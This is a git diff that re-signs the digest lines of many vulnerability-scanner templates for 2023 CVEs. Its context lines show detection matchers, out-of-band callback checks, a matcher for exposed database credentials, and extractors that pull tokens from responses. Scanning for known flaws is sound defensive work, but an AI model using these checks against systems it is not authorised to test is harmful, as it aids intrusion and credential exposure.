digest: 490a0046304402206f1f13980cd4248460f9b3b1861ba42a2bf081a0f62b990f1d8bc96e110664600220583f1bfff336bd27130c8b75bbef19662bc3aa44c1d6e1824dab2bb02cac91b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4012229519fa2761db92e39507fe2caf668a18dac3214d7ee7a2bddb162a488022026a141f13c66eb66e2170134f958feb2a3c58097808460c971629b4a9b26bf46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 2c8467b66c..51fc96b2d1 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502207f5fa23c6975f41020d64c2d8fcf00e92fe5ac1c8fe8e17e5dfa2284fefbf180022100cde57721a573873e8f0f46f15a87d3e886385502949ed9f50aff36b9dccdfc94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b9ce44d92b9596d0ec6940ddf8e5e6fdc35b41d1df3039174a543212b8c8b4a5022100cefe0df1b2f3066f864f771121da6548ed9d59e695fe77e88ab58c7a191fe814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 4bea2f2635..ad9acdee2a 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210090072fab3f7daa8ad22f62f50828a414d2d9547e568b07649118acdd07b16f27022100ee65f1ca805c95fbb8768b88cd1839daef838ec8c290b5470a5e8203b511d478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049c88fd3f275ed9e2255b809b6b960267edb7c2a0633e0355e12cebb3ea6d6c4022100ac1280a9d8184f5b74719713e2656abd8b1fc85aeb06a5bd0ca39d113d2f0134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 64dc1d1902..587afe6245 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100badcc6f7c01e3ebfeba9d79731cabde3a35cf09507addd97975878d01d4d6bb1022100d93e39472b12d5b1c7403c5e5b8a719b384a1f13679d8992246b838cbe6f85f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220519ea0a910a71d0468f28b45ba408d92479c6d9475f80f5ee3d78a14ef061fe6022100c829b535a3c80899d9e626fc41a95764714592bd8dc12ac540792c8a8c3f89d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index ea7445affa..1b681bb5ec 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -66,4 +66,4 @@ http: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' -# digest: 490a0046304402207c13319c615b1019fdab585c8cbd7b2edee47b2af7154ef818ca85bad17fa41902203d468e94c8f9a7cc92a08383e2ea4e4d2f2aa462566a271bfa9c7ca37c8a54a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a2c5ec01132611d909015166f5c83f43e8236a17f3b971ba3d6c194d92e4113022100e81878e9368d2eaa8aab6b3d045aeeea524badbf045c96811a05254f0279a619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index ad7ebe250d..ad625a1726 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -50,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "Subnet masks")' condition: and -# digest: 4a0a00473045022100b43040d5ddff0d907d757322ca19e86d165f3d6ac79b7cc01317cefe96c180a90220747af3c14f10ca46f6e1696b2dac795c114cb9da5911337646a25b4e6a114e17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a3c01aa2ee205f3fe61422324c53106c84b5751e93918bae15c9ba468b0e4a502202271388d4cb8abc60a17e9fc602aaf32c1be6f8f4ef9f40fc23a171b2121345c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 8d8419855b..75538d06f9 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1e27a0f34dc14bd9119c0d0e138879127d2a945f22432b0ee16eefd4fae4fcd02202120d60f8a5b82dd8bb101b21fc46291819c8455bd065df6afa462cc7fb902f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbbf8f01342a3da1aa77a3ac5e20924036502f44daa7678bea6f5d022b3588dc022100dd8315989ca3510f6ac2406e899f14bcd65aff99d82da3f8a31fd4b3153a9a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 4c4ad81018..ff8fb3ef46 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -45,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' -# digest: 490a00463044022069ec2106a76675c191d0555541954f4ca1efe54795dc909ab5799ae5a3c45c1602204731da01a25e1b558aa2849b09255dfd79d27630dbdd890f7a2834424f17ae4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100979ae0c14f78631e1ed9d7c56d050949b4748984129972eed4e454037b3cfb880221008f145d728ced77077fa6122a5df7d0fdefc9b8ba6c81647fa9144410569dbb6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 359e6321da..0ddf9cf853 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074f3529913e227e5f0411e5d925d209de9847be12d25d58a096ebff0c4540b6a02204ff305fe3af41fc2553100e207ba452f264233f8bae6607702862cd0b0b5fa67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205aca91058a68b052da6ad45486312b6d8aabb6f3784060d9f272c810fa6aa5e1022001e381be655320e8762a3c3680508216045524f3a62dc26bd7b30ccd633c98e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 619d9328d1..de102a7587 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a410d762f000309f54731519ff76b949ba22e581faa23443d375858f72011b5022100f0fc76b5b21173b158bd9d70a7ab47b52ba71d848be5e0a48c35caa98aec82d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd39ae8922327a2c38f6ffb4613c1e32fe3cc3f0b37035f194bbe9ef160c183002203173b9e5f324ec0f8b27db0745fc53e338cf8beea96a8daf9db138182ca8512a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index 21eea96cbe..eb244b08b5 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -82,4 +82,4 @@ http: - 'FID,([aA-zZ_]+),' internal: true part: body_2 -# digest: 4a0a004730450221009b053edce21fd6de480945838b88b1d0a40a78956855915543949ee99ce77afd0220279858bce10c1808a98ffa467c52d81d8867015b84472be11d80e3acc10e5cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8d03081deaad597168e42a96ade9cb3d2171483bb602fe10d5e49818378dbda022058809cf715929d605db6001b9328bb309fd710934580675e57040b7819097c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index f0a2d25405..089bfe5f23 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -99,4 +99,4 @@ http: - type: status status: - 400 -# digest: 4a0a0047304502203e73ac9fdf5b0743ff5219b36631bae363aa2c377bcb325db674d83289fa2f5c022100ad756a8663c7df0962fece18df6230af5d78c6bb80beb1e3e0fdbc3e7ee4d25e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040f38271d9eeed074bae69e573d343878cb2471b0becb2a8ec869d630b119ba502200daf17c6f547a912abddcda4a7bf5ad2c352605043e19ce00a29179038bc3555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 50ba96d38f..6a7ca10e25 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b05003982cc5d539c962ab8df15b08afd1484933fdf8f7b332f1ae63a3101926022043b6b3618281d9ad5edbee8271c7e5f6d665e04d97324064ef18eed214421e0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3afd864f1bf88b796f687c498073126b9ad910191e003757e169f65977764d1022004c02947788e53dd7d2b89786adef8739e8b6268a4696b89e5d4371dcdeea76b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 0e48695ae9..8c972fe669 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -46,4 +46,4 @@ http: - contains_all(to_lower(interactsh_request), 'user-agent','curl') - status_code_1 == 302 condition: and -# digest: 490a0046304402207aa0fac0e4628c0de249eac5b623c777c20e853d0ff13525bdb74c4a30bc00050220763758c1ceeba32ba3a3c0b04d1e078802f210bb0b08272ab82323da2edf0170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f1ea263cea2eed76bac36950b39862f66ac454feafa67b6a16e30db96437f7202200627aaf451e88594be1228645a9e55817113148c8a4c460d0c3e41dacf5e1c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index d5daf86b2a..388c0924b4 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -59,4 +59,4 @@ http: - type: dsl dsl: - contains(interactsh_protocol, "dns") -# digest: 4b0a00483046022100d5871c917f51f34d6deee91a3087ffd937ba9f297849249880c00627f9f72b4e022100dd8947408e2038c92eabf9ea24e85a4faf1c9247ae248274ae33bda3702cd484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201deb0e902ab9301973a9175dfbe3c92b2c8761d9afbe744306f431c855dc420c0221008c9d19f10daf8096c7490f8ae6fcf83176884e79179e9bc694da5f1640fae636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index b19e11dbdd..43ebf22a7c 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -53,4 +53,4 @@ http: - contains(body, 'Fax Trace Settings') - status_code == 200 condition: and -# digest: 490a00463044022055d1b7e4c95893decc3dab3d84fe9989e8494bc49b7e6b893d84cc1e4a048b7302207371bad702700e3d7e1d2e24c86e16fb9f9562046931dfcf368e5769c2c600ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009a7f099ca76e35c9d48ea76db7ae39595b4d7d3b44ad22778601e262454a850022100a8825d87405a7a25934d002aa1f95fa710796416b6d3ffd9a412cc026d1c6294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index df55ab250b..d943807728 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204eec07808c796fe47bd1c88eb1df93ec5716fd9073758a669e1322d7b6e4df9b02206ad2b2b3fc6a189cd1a49073e1e51761366c9425452997c29e3919cf59518e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a674aef67c3412d1fa38a98b055ab9ee71ed7bad198dda4b281164d2f4b80ab70220197e5f174c77e9baea72903175072777dab179dcbe9a21b7752f14ddd6255549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 622f061d87..8f995e821b 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b63fae8c757a7959d9bca7e8411cd90e40d3badf4485ee9767b735866828278d022055c879e17b683bdc1c37ab1c29fb7bc38746fe1e757413ff76f152b1836f9dbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a8bfd2d71eccd9ade34973bedfdf5cd932b0672b0b7aa7f6abc9b8419245c8202202d0b47e2cb4612494eedb4b97cb7d09a675e0e1b260d881a62a86038161686e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index e930909f0d..16cb3ea15c 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f483b6e768f5779f0b4be6bda01f39a5cf2258ee03626dc422824b072c4ed27022100f25722589eebbdd333b014b18de6e0dd8e7169033b5fef7a442b465ae8510cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220369c99422e48defa25ecfd647f147650291c7119a47e0dc1e6ac7c604b326479022100aaaa20e9ba989242707c217de18b6debae9bb920d91261d03bf56e876020091e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index c9ec533f79..f8d8943427 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -63,4 +63,4 @@ http: part: header words: - "text/html" -# digest: 4b0a00483046022100bc335dc15804e170ba09bd4de98827d092ce77967b6719237bb645debf5e38100221009a253706430a21c94129f4866759a190637dd34b35c72dd62a2b1e0a84444cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049ae0d61b6974e768810d21126c80845b1073b3d24624d059acad02e830ca5630221008a177ec08fa27677755d03a81905a317a6c9abb094e4b8edc92c6194fb7a2992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 99c2bff499..6715dfd9b4 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -75,4 +75,4 @@ http: regex: - "([0-9]+)" internal: true -# digest: 4b0a00483046022100f76cac79e3bba79e1e24f553046c6c369b367e153c24c9819257afe6ce0581db022100cd45df2138e7ff3528e74590ed131eaa5439e053ac63e9b9aa40d6b2578c1fe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a44e0179362f362e905d1f609ac0e6b82953168cbcaa131defd1fd0d955a9ea4022100a1cebf6f55d89a80c2c0827b351c7ae189a38b42c694d472df9df4d44d960929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 781ca70bf6..86d08185e2 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100934ff1b637515e0ecac3d09098294f06bf8a897dc09a9afa8236f528a3e1c137022100e85cf931c8d91be0bd06a31f3274e5a0f59180d13ac05db24753b9198e2be862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207dc8656d646b7b14e075f0e7b4656ce61aaf7b2371f75c6c2c1b8a5445c399f4022100b4c39a836c6c147f818076bad19a1565e21fb5bac16ebfe8fdb050b6980d4264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 1dca70f4f0..56fdaaaecf 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -63,4 +63,4 @@ http: regex: - ',"static_token":"([0-9a-z]+)",' internal: true -# digest: 4a0a00473045022051c2c544aa88df5ef37dae2610144137829c101a6e858c333ba1a6976f1f5ad3022100d4fb2eea540be019a76aa5e82eead35f2adc71bff1d24e90d37795d563585ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220505e538de0a7417f495151e7828e4e9c1c60805ab390374202dae077362ff09a02201d031f84949b5d962b16a57aac4c5ab5c30b7785284dfd82a4916a01a3c318bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 3889cedc25..35d7f0060d 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -55,4 +55,4 @@ http: part: interactsh_request words: - "User-Agent: Appwrite-Server" -# digest: 4b0a004830460221009995c76e71bc9dfb63841aac9f371ad3473812dd9d9e92771f5127cb7ee8fcc7022100add03fbd8cf31aa10595f8064487e6171a3e858699f964a91273205cea0742f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec6010a276c69eb1badd0cf67d2ca0282bd4c9a27aee843854130ee5365ae29c022100b27588948150ea31d45f27e2189ae144a614c2cb382c50ea4f82c4ea7477cde2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 9ee18735bd..e210ed82af 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aae1076025375cd4ef97f803e224c4076f48a61930dd0dc46f0e499e6ccd48bb022100ee135b1050dfff3ee03dbae3fa46d613bbafaa2b9bb563a5f67239415f9fc369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220379d275a0c0be31a480cb13fc5046a010738ec45ed24aeaa8147bf1dcbe52d3e022100f89e28dc64c5bcf23fe7c11543aecacfd7d128530e7164dc05660d43031b34dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index fc7b92ae06..43c754e585 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb38cf1cbc1e90a6a108d1281bf3d69f08d64d2e50b301b7b8bc260b5a67db880220087e68adec2ea336bf216752b26d541262e503c818cc970d153844c758d202ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081d1e05e2ea2f33253a948d063e31fea25ee4bce0f49f8b2e5481a329495537c02202675bd676048cda1113692411f92fae65ab644597c7826749d0ec7ec6256e387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 8f03713c44..fc98faf4ce 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -133,4 +133,4 @@ http: - 'erList\/selectPrinterCost&sp=([a-z0-9]+)">' internal: true part: body -# digest: 4b0a004830460221009d354896dfc5197fe175c60ac3dc9ca83dc8f744a1ee819b236565f07e2fa379022100bf100d32faa3748a2a5a7f3a3081e592dbc7cf1af921b4324074670798c5ebe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220343c82342201668010f41bfcb0ce5e19faeb271ba730f272c3e18f0a64824d52022021a35706bfda1719735f49763621978327bed13735c8e781ab0cce01d47aec71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 3f147c1e6e..cb84d2444e 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -75,4 +75,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body_2 -# digest: 4b0a0048304602210094f67b702cc3346ddeb9f5641612b4357b608a7123e2a256b7ac8e2f375e19cf022100a64f29ba036ca63f9ff74a922c545f9d67e1a805a5918b0537a0a9ac925d0ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0c77ced102f6fb0687d4c015f0f3ca2d3e3850b68086b7172d1c7cb98c560c1022100f6f66aa67252c9894fb140aebd529e4938a5db1d320ef9110323e846d0022ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index d5e0cd9b50..c68fa39c97 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -70,4 +70,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eaa8ac0a65182f730224ca3055081b5eea65437a110d340c07998585d06e7d9002207b2e5ea28e6be898073c10ec03572e130e6b7a59b9508c11d3b5c2a89a7ed554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5c16ecf9af665f19806f43a62747283296e8a22c9f10f925bef453bc5fbcc7202202f54ecc00060156e6aaa5f52d37ab9f73c9c2042fa17e89d0bdddb4dbc0cd206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index b47418c1cd..3a9f87791f 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -77,4 +77,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fc59900916f76334ed6ff60aca8ce461bebb9927501c28b0e3a1c48f78d8af820221008c131dec5fac44bd24a1e94075f0af16a26c6f41931e7326752ee81220d03ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220228b10a8077e93af4bd15d1409a8aad1deeb3ab9d7a80d7e2152203e63aab184022100d0f1ed1cdeb060d4ba7b7c7d2ee4cba8520828356410f83d4d1a131a6feb8583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index 2480d5748d..6c83738a47 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -44,4 +44,4 @@ http: - 'contains(header,"text/plain")' - 'contains_all(body, "sdbuser =","sdbpassword =")' condition: and -# digest: 4a0a0047304502206c9ebbff9edd11e8cee8b38128cb451cf46cdba78443a4c44a210a07d4f7468502210089db2027c214d7babaac5e1f85f2c4e315117ee5024463cb306e7f6b435c94d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f520060034a6c0d82cce31d8dc6505eda48ddb5b2f609bbc1a0122e963e629a102201e7f85a26f0f017bedaf9303783bb4de9af05b100eb46dc305366c080d49422e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 39939fbab3..ea887070cf 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -72,4 +72,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4a0a00473045022100c9043550aed8b81e9ef9db8d60bdafbd3e317d5a4380bada21e2c40a59eb701202202e91c365dc6c67fdf939724bcad96bb24674d20e4b986917b5fa9c81195eb8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100803bd551a319393f56d5aae8e1a5f4b50669875f42dfffcf37671598462004d1022049f95322641e98ebee3e86be573642b94487e3b09e2ae104fbe8ac3fe71a2dac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index f651dd306b..3b3a041d09 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004a22adc5e62f7794b752c4457a45b432b9e299bc1a0687fb7d826283467f0c102206da3d7c5151e2c6429db61cf12879cdc938473c651fd24f8188dfe64cbad202f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220318de299ca2c8ec9c2bf4cab89f4d98130eb585012a8c03089ff40a74a73fbfe022100f4b9a62a0616c3923b13fb92708b26730c78d499aeea95b8cb059b823818a01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index e95a79f3b1..9832ceaad6 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022055aa8107bd7d4d0fff2c0e8689d5dcf8d5325b11639dbcf31479cb2207825612022100b4ee88e610a2506569a49715d63d2c174cd346a6cd0a86c303baf4e227a1bb3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ae64bd3cc36ccd3c52debfd02f43bf19862246f1fd8ef1b705625959d341f8a022100c90f789a33e2667c2fe0f33bd9110d6cdae42c665fc455452870f4c553772a28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 26664e47c7..ac7c55eebe 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -215,4 +215,4 @@ http: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body -# digest: 4a0a00473045022100cf8fdde8726815d587a1a5a92c0a748c63b2c0ded1c58cd824f3b4e26b98ac0a02201495555a41cfb23fb565e0c5151f37c8257b5adc230d11c0a821899c594614f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfd3431d04aa76f4f656e43eb506273387a8299167937a29af634da664383762022043221d39d47a5c3aff4ea35ebd7ca48af5ba36ec2866494452f9b42702206196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 77204f5b20..b9990e4810 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022007bff5910c7995c188ae6031143eb43d7170ad3caea04a1eb6ee71c0e026e29202201779c8cc2c73090961a6632e0d0309178e9e50be5f9c4145c926fecebe300cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017d3b24a6ca0d2839916b9f74f0f246b9245b3cc54f412eed73fcb61e4ee800202200adba4b62cafffe2f6b959eb2efa0a9b06442f757dfa2ac365f31dec9192d724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 6e80e2bc66..1fbddebaf3 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 